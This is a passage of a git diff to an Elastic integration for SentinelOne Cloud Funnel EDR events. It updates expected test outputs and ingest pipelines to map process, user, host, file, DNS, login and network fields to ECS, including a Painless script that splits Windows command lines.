_WIN32\",\"src.process.crossProcessOpenProcessCount\":0,\"tgt.process.image.binaryIsExecutable\":true,\"tgt.process.image.sha256\":\"b00b5e5d4e268b8dbd0af0749edb6626e686403c71f1c81ae08d18242046f29e\",\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"PROCESSCREATION\",\"src.process.parent.integrityLevel\":\"SYSTEM\",\"tgt.process.publisher\":\"NEWRELIC,INC.\",\"src.process.indicatorExploitationCount\":0,\"src.process.parent.storyline.id\":\"F8C44B7A0C80D2E7\",\"tgt.process.verifiedStatus\":\"verified\",\"tgt.process.image.path\":\"C:\\\\ProgramFiles\\\\NewRelic\\\\newrelic-infra\\\\newrelic-integrations\\\\nr-winpkg.exe\",\"src.process.integrityLevel\":\"SYSTEM\",\"i.scheme\":\"edr\",\"tgt.process.integrityLevel\":\"SYSTEM\",\"site.name\":\"ASDF\",\"src.process.netConnInCount\":1,\"tgt.process.image.md5\":\"65f9131df4b7c909ae41add0fcd172fa\",\"event.time\":1664811149470,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"asdf1\",\"src.process.image.sha1\":\"7f3981d9bf5d134065541387a77b9f651471fa0f\",\"src.process.isStorylineRoot\":false,\"src.process.parent.image.path\":\"C:\\\\ProgramFiles\\\\NewRelic\\\\newrelic-infra\\\\newrelic-infra-service.exe\",\"src.process.pid\":3596,\"tgt.file.isSigned\":\"signed\",\"src.process.cmdline\":\"C:\\\\ProgramFiles(x86)\\\\Microsoft\\\\important_stuff\\\\stuff.EXE\\\\\",\"src.process.publisher\":\"NEWRELIC,INC.\",\"sca:ingestTime\":1664811195,\"dataSource.category\":\"security\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":false,\"src.process.parent.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"a1d7ac9e15c26535a7dec40bba21cda4de078504\",\"src.process.crossProcessCount\":0,\"src.process.signedStatus\":\"signed\",\"event.id\":\"01GEF7NPDYKJDP1X0XSQ9K7J2N_41\",\"src.process.parent.cmdline\":\"\\\"C:\\\\ProgramFiles\\\\NewRelic\\\\newrelic-infra\\\\newrelic-infra-service.exe\\\"\",\"src.process.image.path\":\"C:\\\\ProgramFiles\\\\NewRelic\\\\newrelic-infra\\\\newrelic-infra.exe\",\"src.process.tgtFileModificationCount\":516119,\"src.process.indicatorEvasionCount\":2100,\"src.process.netConnOutCount\":7330,\"tgt.process.pid\":4720,\"src.process.crossProcessDupThreadHandleCount\":0,\"tgt.process.name\":\"nr-winpkg.exe\",\"endpoint.os\":\"windows\",\"src.process.tgtFileDeletionCount\":5621,\"tgt.process.signedStatus\":\"signed\",\"src.process.startTime\":1662784606181,\"mgmt.id\":\"1337\",\"os.name\":\"WindowsServer2019Datacenter\",\"tgt.process.cmdline\":\"./nr-winpkg\",\"src.process.displayName\":\"newrelic-infra.exe\",\"src.process.parent.sessionId\":0,\"src.process.isNative64Bit\":false,\"src.process.uid\":\"F59445BAF5BC03DA\",\"src.process.parent.image.md5\":\"8c3eb2770d8eed24ce33d77f7668fea5\",\"src.process.indicatorBootConfigurationUpdateCount\":0,\"src.process.indicatorInfostealerCount\":0,\"process.unique.key\":\"D0046CBAF5BC03DA\",\"tgt.process.uid\":\"D0046CBAF5BC03DA\",\"tgt.process.isStorylineRoot\":false,\"src.process.parent.uid\":\"C19445BAF5BC03DA\",\"agent.version\":\"22.1.2.217\",\"src.process.parent.image.sha256\":\"f62c2d5c9e7605c75a0c8fcb9c2b506267ca0e6706766e033495d81dac4e302c\",\"src.process.sessionId\":0,\"src.process.netConnCount\":7331,\"mgmt.osRevision\":\"17763\",\"group.id\":\"asdf\",\"tgt.process.startTime\":1664811149464,\"src.process.parent.publisher\":\"NEWRELIC,INC.\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.verifiedStatus\":\"verified\",\"src.process.parent.startTime\":1662784605701,\"src.process.dnsCount\":565,\"endpoint.type\":\"server\",\"trace.id\":\"01GEF7NPDYKJDP1X0XSQ9K7J2N\",\"src.process.name\":\"newrelic-infra.exe\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"src.process.image.sha256\":\"058043b4d2b74a31dda6966a7a0c292a04e898bd4dabaefdc6b0eabf518c40d1\",\"tgt.process.user\":\"NTAUTHORITY\\\\SYSTEM\",\"src.process.indicatorGeneralCount\":4180,\"src.process.crossProcessOutOfStorylineCount\":0,\"src.process.registryChangeCount\":146,\"packet.id\":\"62D7376456284C24A2067FE50BA5B7D7\",\"tgt.process.sessionId\":0,\"src.process.indicatorPersistenceCount\":0,\"src.process.parent.signedStatus\":\"signed\",\"src.process.parent.user\":\"asdf\\\\SYSTEM\",\"tgt.process.isRedirectCmdProcessor\":false,\"event.type\":\"ProcessCreation\",\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.pid\":3132}", "type": [ - "info" + "start" ] }, "group": { @@ -21,15 +24,22 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2019Datacenter", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, "process": { + "args": [ + "./nr-winpkg" + ], + "args_count": 1, "command_line": "./nr-winpkg", "entity_id": "D0046CBAF5BC03DA", + "executable": "C:\\ProgramFiles\\NewRelic\\newrelic-infra\\newrelic-integrations\\nr-winpkg.exe", "hash": { "md5": "65f9131df4b7c909ae41add0fcd172fa", "sha1": "a1d7ac9e15c26535a7dec40bba21cda4de078504", @@ -37,8 +47,18 @@ }, "name": "nr-winpkg.exe", "parent": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "NEWRELIC,INC.", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "F59445BAF5BC03DA", + "executable": "C:\\ProgramFiles\\NewRelic\\newrelic-infra\\newrelic-infra.exe", "hash": { "md5": "7c99f420f8985a4ccf428f9fe2b090f0", "sha1": "7f3981d9bf5d134065541387a77b9f651471fa0f", @@ -257,7 +277,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-registry.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-registry.log-expected.json index 19b0cc3aa3b..2c775afeaed 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-registry.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-registry.log-expected.json @@ -6,6 +6,9 @@ "version": "8.11.0" }, "event": { + "action": [ + "creation" + ], "category": [ "registry" ], @@ -21,15 +24,27 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows7Professional", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "desktop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "7A5B258D66B11991", + "executable": "C:\\Windows\\system32\\svchost.exe", "hash": { "md5": "c78655bc80301d76ed4fef1c1ea40a7d", "sha1": "619652b42afe5fb0e3719d7aeda7a5494ab193e8", @@ -37,8 +52,13 @@ }, "name": "svchost.exe", "parent": { + "args": [ + "C:\\Windows\\system32\\services.exe" + ], + "args_count": 1, "command_line": "C:\\Windows\\system32\\services.exe", "entity_id": "55A75E7FE942CE7D", + "executable": "C:\\Windows\\system32\\services.exe", "hash": { "sha1": "ff658a36899e43fec3966d608b4aa4472de7a378", "sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536" @@ -59,7 +79,12 @@ } }, "registry": { - "key": "MACHINE\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\##?#PCI#VEN_10EE&DEV_0300&SUBSYS_044D173E&REV_00#4&353c0d9e&0&20F0#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\#Topology\\Properties\\{d1885396-39d8-4777-bcff-5e3241483416}\\00000000\\00000000\\Type" + "data": { + "type": "BINARY" + }, + "key": "MACHINE\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\##?#PCI#VEN_10EE&DEV_0300&SUBSYS_044D173E&REV_00#4&353c0d9e&0&20F0#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\#Topology\\Properties\\{d1885396-39d8-4777-bcff-5e3241483416}\\00000000\\00000000", + "path": "MACHINE\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\##?#PCI#VEN_10EE&DEV_0300&SUBSYS_044D173E&REV_00#4&353c0d9e&0&20F0#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\#Topology\\Properties\\{d1885396-39d8-4777-bcff-5e3241483416}\\00000000\\00000000\\Type", + "value": "Type" }, "related": { "hash": [ @@ -235,7 +260,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-scheduled-task.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-scheduled-task.log-expected.json index 8b0318f6a69..59b7613cec9 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-scheduled-task.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-scheduled-task.log-expected.json @@ -15,15 +15,27 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Enterprise", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "laptop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "LENOVO", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "0AF3AD1313577E13", + "executable": "C:\\Windows\\Lenovo\\ImController\\Service\\Lenovo.Modern.ImController.exe", "hash": { "md5": "9b86c2a9ff7b8e697a9bbe015d4c9d0e", "sha1": "c364f32c9df2fb147131618b9793346ae5d8f745", @@ -31,8 +43,13 @@ }, "name": "Lenovo.Modern.ImController.exe", "parent": { + "args": [ + "C:\\Windows\\system32\\services.exe" + ], + "args_count": 1, "command_line": "C:\\Windows\\system32\\services.exe", "entity_id": "2AF2AD1313577E13", + "executable": "C:\\Windows\\System32\\services.exe", "hash": { "sha1": "d7a213f3cfee2a8a191769eb33847953be51de54", "sha256": "dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674" @@ -287,7 +304,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-threat-intelligence-indicator.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-threat-intelligence-indicator.log-expected.json index a9b37fbdada..c59d97a5e87 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-threat-intelligence-indicator.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-threat-intelligence-indicator.log-expected.json @@ -21,15 +21,25 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Linux", - "platform": "linux" + "platform": "linux", + "type": "linux" }, "type": "server" }, "process": { + "args": [ + "-D" + ], + "args_count": 1, + "code_signature": { + "exists": false + }, "command_line": "-D", "entity_id": "09edcd06-faa9-1575-1f8b-46a5ad0ac0fe", + "executable": "/usr/sbin/sshd", "hash": { "sha1": "4fe13081b31b55176af7dee8354ea18ad3ca4c59" }, @@ -183,7 +193,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "root", + "name": "root" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-url.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-url.log-expected.json index d8c2c5afca4..a80d672d915 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-url.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-url.log-expected.json @@ -2,6 +2,13 @@ "expected": [ { "@timestamp": "2022-10-03T15:32:29.475Z", + "destination": { + "address": "www.asdf.com", + "domain": "www.asdf.com", + "registered_domain": "asdf.com", + "subdomain": "www", + "top_level_domain": "com" + }, "ecs": { "version": "8.11.0" }, @@ -15,15 +22,25 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2019Datacenter", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": false + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "E1471D24880BECFA", + "executable": "C:\\MetSrc\\sourcelink5.exe", "hash": { "md5": "ac5ebf6878c1226542453aea56e451a2", "sha1": "186fdd875432f3af106eb973fbc871240f35964e", @@ -31,8 +48,13 @@ }, "name": "sourcelink5.exe", "parent": { + "args": [ + "C:\\MetSrc\\nssm.exe" + ], + "args_count": 1, "command_line": "C:\\MetSrc\\nssm.exe", "entity_id": "632D1A24880BECFA", + "executable": "C:\\MetSrc\\nssm.exe", "hash": { "sha1": "47c112c23c7bdf2af24a20bd512f91ff6af76bc6", "sha256": "f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97" @@ -221,7 +243,13 @@ "preserve_duplicate_custom_fields" ], "url": { - "original": "http://www.asdf.com" + "domain": "www.asdf.com", + "original": "http://www.asdf.com", + "scheme": "http" + }, + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" } } ] diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/default.yml index b62cb1da528..fb0f64039a6 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/default.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/default.yml @@ -199,6 +199,17 @@ processors: field: host.os.platform copy_from: sentinel_one_cloud_funnel.event.endpoint.os ignore_empty_value: true + - set: + field: host.os.type + copy_from: sentinel_one_cloud_funnel.event.endpoint.os + if: >- + [ + 'linux', + 'windows', + 'macos', + 'ios', + 'android' + ].contains(ctx.sentinel_one_cloud_funnel?.event?.endpoint?.os) - append: field: related.hosts value: '{{{sentinel_one_cloud_funnel.event.endpoint.os}}}' @@ -229,6 +240,10 @@ processors: field: json.src.process.image.path target_field: sentinel_one_cloud_funnel.event.src.process.image.path ignore_missing: true + - set: + field: process.executable + copy_from: sentinel_one_cloud_funnel.event.src.process.image.path + ignore_empty_value: true - rename: field: json.src.process.image.md5 target_field: sentinel_one_cloud_funnel.event.src.process.image.md5 @@ -554,6 +569,19 @@ processors: field: process.user.name copy_from: sentinel_one_cloud_funnel.event.src.process.user.name ignore_empty_value: true + - set: + field: user.name + copy_from: process.user.name + ignore_empty_value: true + - set: + field: user.domain + copy_from: process.user.name + ignore_empty_value: true + - dissect: + field: process.user.name + pattern: '%{user.domain}\%{user.name}' + if: ctx.process?.user?.name?.contains('\\') == true + description: "Split user and domain" - rename: field: json.src.process.eUserName target_field: sentinel_one_cloud_funnel.event.src.process.e_user.name @@ -595,6 +623,10 @@ processors: field: json.agent.uuid target_field: sentinel_one_cloud_funnel.event.agent.uuid ignore_missing: true + - set: + field: host.id + copy_from: sentinel_one_cloud_funnel.event.agent.uuid + ignore_empty_value: true - rename: field: json.agent.version target_field: sentinel_one_cloud_funnel.event.agent.version @@ -1457,6 +1489,10 @@ processors: field: json.src.process.parent.image.path target_field: sentinel_one_cloud_funnel.event.src.process.parent.image.path ignore_missing: true + - set: + field: process.parent.executable + copy_from: sentinel_one_cloud_funnel.event.src.process.parent.image.path + ignore_empty_value: true - rename: field: json.src.process.parent.integrityLevel target_field: sentinel_one_cloud_funnel.event.src.process.parent.integrity_level @@ -1868,6 +1904,14 @@ processors: field: json.src.process.signedStatus target_field: sentinel_one_cloud_funnel.event.src.process.signed_status ignore_missing: true + - set: + field: process.code_signature.exists + value: true + if: ctx.sentinel_one_cloud_funnel?.event?.src?.process?.signed_status == 'signed' + - set: + field: process.code_signature.exists + value: false + if: ctx.sentinel_one_cloud_funnel?.event?.src?.process?.signed_status == 'unsigned' - convert: field: json.src.process.tgtFileDeletionCount tag: 'convert_json_src_process_tgtFileDeletionCount' @@ -1976,10 +2020,23 @@ processors: field: json.src.process.publisher target_field: sentinel_one_cloud_funnel.event.src.process.publisher ignore_missing: true + - set: + field: process.code_signature.subject_name + copy_from: sentinel_one_cloud_funnel.event.src.process.publisher + ignore_empty_value: true - rename: field: json.src.process.verifiedStatus target_field: sentinel_one_cloud_funnel.event.src.process.verified_status ignore_missing: true + - set: + field: process.code_signature.trusted + value: true + if: ctx.sentinel_one_cloud_funnel?.event?.src?.process?.verified_status?.contains('verified') == true + - set: + field: process.code_signature.trusted + value: false + override: false + if: ctx.process?.code_signature?.exists == true - rename: field: json.driver.certificate.thumbprint target_field: sentinel_one_cloud_funnel.event.driver.certificate.thumbprint.value @@ -2702,6 +2759,96 @@ processors: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - script: + # This must happen after the pipelines since the process pipeline also touches process.command_line. + description: Implements Windows-like SplitCommandLine + lang: painless + if: |- + (ctx.process?.command_line != null && ctx.process.command_line != "") || + (ctx.process?.parent?.command_line != null && ctx.process.parent.command_line != "") + source: |- + // appendBSBytes appends n '\\' bytes to b and returns the resulting slice. + def appendBSBytes(StringBuilder b, int n) { + for (; n > 0; n--) { + b.append('\\'); + } + return b; + } + + // readNextArg splits command line string cmd into next + // argument and command line remainder. + def readNextArg(String cmd) { + def b = new StringBuilder(); + boolean inquote; + int nslash; + for (; cmd.length() > 0; cmd = cmd.substring(1)) { + def c = cmd.charAt(0); + if (c == (char)' ' || c == (char)0x09) { + if (!inquote) { + return [ + "arg": appendBSBytes(b, nslash).toString(), + "rest": cmd.substring(1) + ]; + } + } else if (c == (char)'"') { + b = appendBSBytes(b, nslash/2); + if (nslash%2 == 0) { + // use "Prior to 2008" rule from + // http://daviddeley.com/autohotkey/parameters/parameters.htm + // section 5.2 to deal with double double quotes + if (inquote && cmd.length() > 1 && cmd.charAt(1) == (char)'"') { + b.append(c); + cmd = cmd.substring(1); + } + inquote = !inquote; + } else { + b.append(c); + } + nslash = 0; + continue; + } else if (c == (char)'\\') { + nslash++; + continue; + } + b = appendBSBytes(b, nslash); + nslash = 0; + b.append(c); + } + return [ + "arg": appendBSBytes(b, nslash).toString(), + "rest": '' + ]; + } + + // commandLineToArgv splits a command line into individual argument + // strings, following the Windows conventions documented + // at http://daviddeley.com/autohotkey/parameters/parameters.htm#WINARGV + // Original implementation found at: https://github.com/golang/go/commit/39c8d2b7faed06b0e91a1ad7906231f53aab45d1 + def commandLineToArgv(String cmd) { + def args = new ArrayList(); + while (cmd.length() > 0) { + if (cmd.charAt(0) == (char)' ' || cmd.charAt(0) == (char)0x09) { + cmd = cmd.substring(1); + continue; + } + def next = readNextArg(cmd); + cmd = next.rest; + args.add(next.arg); + } + return args; + } + + def cmd = ctx.process?.command_line; + if (cmd != null && cmd != "") { + ctx.process.args = commandLineToArgv(cmd); + ctx.process.args_count = ctx.process.args.length; + } + + def parentCmd = ctx.process?.parent?.command_line; + if (parentCmd != null && parentCmd != "") { + ctx.process.parent.args = commandLineToArgv(parentCmd); + ctx.process.parent.args_count = ctx.process.parent.args.length; + } - remove: field: json ignore_missing: true diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-command-script.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-command-script.yml index d05e538b431..af2ae2c3c3b 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-command-script.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-command-script.yml @@ -28,6 +28,10 @@ processors: field: json.cmdScript.content target_field: sentinel_one_cloud_funnel.event.cmd_script.content ignore_missing: true + - set: + field: powershell.file.script_block_text + copy_from: sentinel_one_cloud_funnel.event.cmd_script.content + ignore_empty_value: true - convert: field: json.cmdScript.isComplete tag: 'convert_json_cmdScript_isComplete' diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-dns.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-dns.yml index c9d4e82c9f1..f5a045a4601 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-dns.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-dns.yml @@ -6,11 +6,18 @@ processors: value: [network] - set: field: event.type - value: [info] + value: [info, protocol] + - set: + field: event.action + value: [lookup_requested] - rename: field: json.event.dns.request target_field: sentinel_one_cloud_funnel.event.dns.request ignore_missing: true + - set: + field: dns.question.name + copy_from: sentinel_one_cloud_funnel.event.dns.request + ignore_empty_value: true - rename: field: json.event.dns.response target_field: sentinel_one_cloud_funnel.event.dns.response diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-file.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-file.yml index 64f192d6196..bbad4016d03 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-file.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-file.yml @@ -4,21 +4,50 @@ processors: - set: field: event.category value: [file] - - set: - field: event.type - value: [info] - set: field: event.type value: [creation] - if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('creat') + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('creat') - set: field: event.type value: [deletion] - if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('delet') + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('delet') - set: field: event.type value: [change] - if: ctx.sentinel_one_cloud_funnel?.event?.type != null && (ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('change') || ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('modif')) + if: >- + ctx.sentinel_one_cloud_funnel?.event?.type != null && + ( + ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('change') || + ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('modif') || + ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('rename') + ) + - set: + field: event.type + value: [info] + override: false + - set: + field: event.action + value: [creation] + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('creat') + - set: + field: event.action + value: [deletion] + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('delet') + - set: + field: event.action + value: [change] + if: >- + ctx.sentinel_one_cloud_funnel?.event?.type != null && + ( + ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('change') || + ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('modif') + ) + - set: + field: event.action + value: [rename] + if: >- + ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('rename') - rename: field: json.k8sCluster.containerId target_field: sentinel_one_cloud_funnel.event.k8s_cluster.container.id @@ -152,6 +181,38 @@ processors: field: file.path copy_from: sentinel_one_cloud_funnel.event.tgt.file.path ignore_empty_value: true + - rename: + field: json.tgt.file.type + target_field: sentinel_one_cloud_funnel.event.tgt.file.type + ignore_missing: true + - set: + field: file.type + copy_from: sentinel_one_cloud_funnel.event.tgt.file.type + ignore_empty_value: true + - script: + lang: painless + if: ctx.sentinel_one_cloud_funnel?.event?.tgt?.file?.path instanceof String && ctx.sentinel_one_cloud_funnel.event.tgt.file.path.length() > 1 + source: |- + def path = ctx.sentinel_one_cloud_funnel.event.tgt.file.path; + def idx = path.lastIndexOf("\\"); + if (idx == -1) { + idx = path.lastIndexOf("/"); + } + if (idx > -1) { + if (ctx.file == null) { + ctx.file = new HashMap(); + } + ctx.file.name = path.substring(idx+1); + ctx.file.directory = path.substring(0, idx); + + def extIdx = ctx.file.name.lastIndexOf("."); + if (extIdx > -1 && ctx.file.type == "file") { + ctx.file.extension = ctx.file.name.substring(extIdx+1); + } + } + if (path.indexOf(':') == 1) { + ctx.file.drive_letter = path.substring(0, 1).toUpperCase(); + } - convert: field: json.tgt.file.size tag: 'convert_json_tgt_file_size' @@ -167,14 +228,6 @@ processors: field: file.size copy_from: sentinel_one_cloud_funnel.event.tgt.file.size ignore_empty_value: true - - rename: - field: json.tgt.file.type - target_field: sentinel_one_cloud_funnel.event.tgt.file.type - ignore_missing: true - - set: - field: file.type - copy_from: sentinel_one_cloud_funnel.event.tgt.file.type - ignore_empty_value: true - convert: field: json.src.process.tid tag: 'convert_json_src_process_tid' diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-login.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-login.yml index e1820501b2d..c83e7cb74a8 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-login.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-login.yml @@ -4,9 +4,18 @@ processors: - set: field: event.category value: [authentication] + - set: + field: event.type + value: [start] + if: ctx.sentinel_one_cloud_funnel?.event?.type == 'Login' + - set: + field: event.type + value: [end] + if: ctx.sentinel_one_cloud_funnel?.event?.type == 'Logout' - set: field: event.type value: [info] + override: false - rename: field: json.event.login.userName target_field: sentinel_one_cloud_funnel.event.login.user_name diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-network-action.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-network-action.yml index 623d2b7dc16..7d597eb2cf6 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-network-action.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-network-action.yml @@ -6,7 +6,18 @@ processors: value: [network] - set: field: event.type - value: [info] + value: [start, connection] + if: (ctx.sentinel_one_cloud_funnel?.event?.type == 'IPConnect' || ctx.sentinel_one_cloud_funnel?.event?.type == 'IP Connect') + - set: + field: event.action + value: [connection_attempted] + if: (ctx.sentinel_one_cloud_funnel?.event?.type == 'IPConnect' || ctx.sentinel_one_cloud_funnel?.event?.type == 'IP Connect') && + ctx.sentinel_one_cloud_funnel?.event?.network?.direction == "OUTGOING" + - set: + field: event.action + value: [connection_accepted] + if: (ctx.sentinel_one_cloud_funnel?.event?.type == 'IPConnect' || ctx.sentinel_one_cloud_funnel?.event?.type == 'IP Connect') && + ctx.sentinel_one_cloud_funnel?.event?.network?.direction == "INCOMING" - rename: field: json.k8sCluster.containerId target_field: sentinel_one_cloud_funnel.event.k8s_cluster.container.id @@ -73,6 +84,10 @@ processors: field: destination.ip copy_from: sentinel_one_cloud_funnel.event.dst.ip_address ignore_empty_value: true + - set: + field: destination.address + copy_from: sentinel_one_cloud_funnel.event.dst.ip_address + ignore_empty_value: true - convert: field: json.dst.port.number tag: 'convert_json_dst_port_number' @@ -203,6 +218,17 @@ processors: field: json.k8sCluster.podName target_field: sentinel_one_cloud_funnel.event.k8s_cluster.pod.name ignore_missing: true + - append: + field: event.type + value: connection + allow_duplicates: false + if: >- + (ctx.source?.ip != null || ctx.source?.address != null) && ctx.source?.port != null && + (ctx.destination?.ip != null || ctx.destination?.address != null) && ctx.destination?.port != null + - set: + field: event.type + value: 